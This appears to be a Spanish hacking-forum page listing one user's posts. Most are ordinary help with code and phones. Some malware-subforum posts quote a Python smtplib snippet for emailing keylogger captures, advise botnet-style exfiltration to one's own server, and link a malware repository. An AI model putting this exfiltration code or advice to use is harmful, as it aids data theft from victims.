elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Mensajes
Páginas: 1 ... 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 [39] 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 ... 287
381  Seguridad Informática / Seguridad / Re: Necesito consejo/ayuda con seguridad en mi movil. en: 9 Septiembre 2020, 13:57 pm
lo mejor es usar un movil de segunda mano, con otra sim que no este a tu nombre y conectarla solo a wifis publicos
Para que quieres la SIM entonces si solo vas a conectarse a Wi-Fis públicos.

Sigues enviando la MAC al router de la red wi-fi, la cercanía basada en la intensidad, las redes wi-fi a las que te conectas, el tiempo de conexión...

Querer ser anónimo en Android con hardware de Xiaomi es como querer ser anónimo concediendo una entrevista a un canal de televisión tras interrumpir un partido de futbol. xD

Y aún por encima utilizando whatsapp, instagram y navegador conectado al dispositivo de otro.

Miran los logs de ese dispositivo y ven que un dispositivo se conectó, el chip que tiene, el whatsapp utiliza la sesión existente, el insta a saber si te hace fingerprint del cpu/gpu y que más...

y usar un nokia de los antiguos como por ejemplo el nokia 3310 (el real)
La SIM manda información que permite geolocalizarte entre otras cosas.
382  Programación / Programación C/C++ / Re: Colocar signos entre los datos de un array en: 9 Septiembre 2020, 13:36 pm
Código
  1. cout << "Los números ingresados ordenados de menor a mayor: ";
  2. for (int i=0;i<10;i++)
  3. {
  4.  cout << numeros;
  5.  if(i != 9) {
  6.    cout << ", ";
  7.  }
  8. }

Esta es una opción, decirle que si no es el decimo número que ponga la coma.

También puedes hacer push al array de la coma, etc.
383  Programación / Desarrollo Web / Re: [Pregunta]: Variable global (javascript) en: 9 Septiembre 2020, 04:02 am
El código PHP no va a existir en absolutamente ningún momento en el navegador. El servidor es quien procesa en el código PHP y te mandan una web como si el PHP no existiera.

El resultado que mandas al navegador es este:
Código
  1. <body>
  2. <script>
  3. $(document).ready(function() {
  4.  var my_variable = 'texto'; // defino la variable
  5.  Ejecuta_Ajax();
  6. });
  7. </script>
  8.  
  9. <script>
  10. $(document).ready(function() {
  11.  console.log(my_variable); // va a decirme que no está definida dicha variable.
  12. });
  13. </script>
  14. </body>

Como ya te han comentado y yo mismo te comenté no hace mucho en respuesta a uno de tus temas de forma bastante concreta el uso de var, let, globales y alcances. Al usar var estás definiendo la variable en el contexto de la función "más cercana"(en caso de haberla), no de forma global.

Si quieres definirla de forma global desde dentro de una función lo normal es que la definas explícitamente como propiedad del objeto giobal:
Código
  1. window.my_variable = "texto";

Utilizando librerías palante y ensuciando el alcance global a tutiplen por desconocimiento lo único que vas a conseguir es dolores de cabeza.

Mi consejo cuando programes con PHP y en general es que dejes de utilizar el document ready y en su lugar simplemente coloques todo el código javascript normalmente en un único script en la parte final justo antes de la etiqueta de cierre del body. Dado a como funcionan los parsers no vas a tener problemas porque se procesará el HTML por orden, y como las etiquetas script son HTML, cuando llegues a ellas ya tendrás todo el HTML anterior procesado y listo para manipular.

Cuando tienes todo el codigo al final en un solo script, perfectamente puedes moverlo a un archivo externo como te están aconsejando y a lo que yo me sumo.

Hacer esto tiene muchas ventajas. Como reducir el tamaño total de la web, hacer posibles la implementación de una cuantas medidas de seguridad para evitar multiples exploits, ahorrarte tiempo de portar cambios entre codigo que tengas repetido o incongruencias, facilitar la localización y manejo...

También es viable mover un archivo con funciones puras al head y la implementación/llamadas al body. Es una forma cómoda de separar algunas librerías o posibilitar elementos html custom. Uno de los ejemplos más populares son los templates con las etiquetas script.

He visto que estás acostumbrado a meter muchqs etiquetas script con document.write("ejemplo"). En lugar de hacer esto puedes meter una sola librería para habilitar mustache sintax y así solo necesitas poner {{ ejemplo }} y la librería te lo remplazará. No estoy seguro pero creo que jquery tiene algo así.

En general los frameworks modernos te permiten hacer esto. Te aconsejo vue.js, es el más simple y sencillo. Aunque también tienes librerías independientes muy completas y compactas.
384  Programación / Desarrollo Web / Re: Variable un Href en específico en: 9 Septiembre 2020, 03:14 am
Código
  1. var enlace = document.querySelector("#start-button");
  2. enlace.innerText = enlace.href.substr(49, 5);

Se obtiene el elemento HTML a y se asigna una referencia a una variable enlace utilizando querySelector y un selector por id como parámetro ya que el id en HTML presume ser un elemento único en toda la web.
Se obtiene el atributo href del elemento como string y se obtiene un subStr con el método substr del tipo referenciado String. El primer parámetro es la posición inicial/primer elemento del substring. El segundo parámetro (se puede omitir para obtener el substr hasta el final) es el número de caracteres a obtener.
Se asigna este a la propiedad innerText, homólogo de innerHTML pero que inhabilita la ejecución indeseada de código poco probable (pero posible) al utilizar cadenas con cierto rango de aletoriedad.

Como aclaración los elementos a no son botones. Tienes botones de verdad como <button type="button">Click</button>
385  Foros Generales / Dudas Generales / Re: Creación de pagina web en: 9 Septiembre 2020, 02:52 am
cual es el mejor editor?
Yo uso vim, es cómodo si trabajas desde la terminal.
386  Foros Generales / Foro Libre / Re: Vuestra opinion acerca de este trabajo. en: 7 Septiembre 2020, 14:30 pm
Mándale varios ataques de phishing a todos los empleados con un virus que simplemente haga una peti a tu server con el nombre del equipo, hora, ip, mac... Después buscas a los que se vieron afectados y le echas la bronca.

Igual ni siquiera es ese el punto de infección, la gente hace cosas muy random. Igual tienes a alguno bajándose películas del ares, otro que trae sus "programas" en un pendrive, otro que se conecta a un proxy random...

Métele un servidor dns y si vuelve a pasar ya sabes quien es el fenóneno mirando los logs el día de infección.

387  Seguridad Informática / Análisis y Diseño de Malware / Re: enviar datos con python 3 en: 6 Septiembre 2020, 13:21 pm
estoy teniendo problemas con un keylogger se supone que debe enviarme los datos que capture por correo electrónico el problema es que toda la información recure al uso de la librería smtplib estoy usando python 3 y el código siempre recure a gmail sobra decir porque dar una cuenta de gmail a un virus es una idea oribe como solución que halle fue usar el servisio de coreo tutanota el problema es que no se como hacer para que mi programa mande la información usando tutanota en lugar de gmail. normalmente intentaría adaptar este código:
Código:
import smtplib
server = smtplib.SMTP("smtp.gmail.com", 587)
server.ehlo()
server.starttls()
server.ehlo()
server.login("usuario", "1234")
msg = "datos"
server.sendmail("prueba1@gmail.com", "prueba2@gmail.com", msg)
server.quit()

y luego lo refinaría pero cada ves que toco algo aparecen 10 errores, ni siquiera estoy seguro de si el modulo smtplib sirve para esto y en internen no e encontrado información
agradecería cualquier ayuda esto se esta convirtiendo en un dolor de cabeza enorme.  
Usa tu propio server en lugar del de Google. Puedes hardcodearle llaves públicas a los zombies y que manden siempre la última versión de los mensajes a nuevos nodos.
388  Seguridad Informática / Análisis y Diseño de Malware / Re: Ocultar ip en backdoor en: 6 Septiembre 2020, 13:02 pm
como extra cifra el codigo y programa el virus para que si en x tiempo no te conectas se auto-destruya y si tratan de detener su poseso se auto-destruya
No es práctico.
389  Comunicaciones / Redes / Re: ¿Que son los servidores, y como funcionan? en: 5 Septiembre 2020, 16:46 pm
Estudia el protocolo http. En pdfdrive.com tienes libros gratis.

Un servidor web es un programa que responde texto a sus usuarios. Normalmente html.
El navegador interpreta estos códigos html para formar elementos que en su conjuto forma la página web.

No tiene mucha ciencia. Puedes hacer uno muy básico con netcat.
390  Seguridad Informática / Análisis y Diseño de Malware / Re: Malwares en: 5 Septiembre 2020, 16:37 pm
hola, tengo la misma pregunta, les agradeceria que me enviaran un ejemplo para usarlo y probarlo en android
https://foro.elhacker.net/abril_negro/abril_negro_2020_rs-t504626.0.html

https://github.com/stringmanolo/rs
Páginas: 1 ... 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 [39] 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 ... 287
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines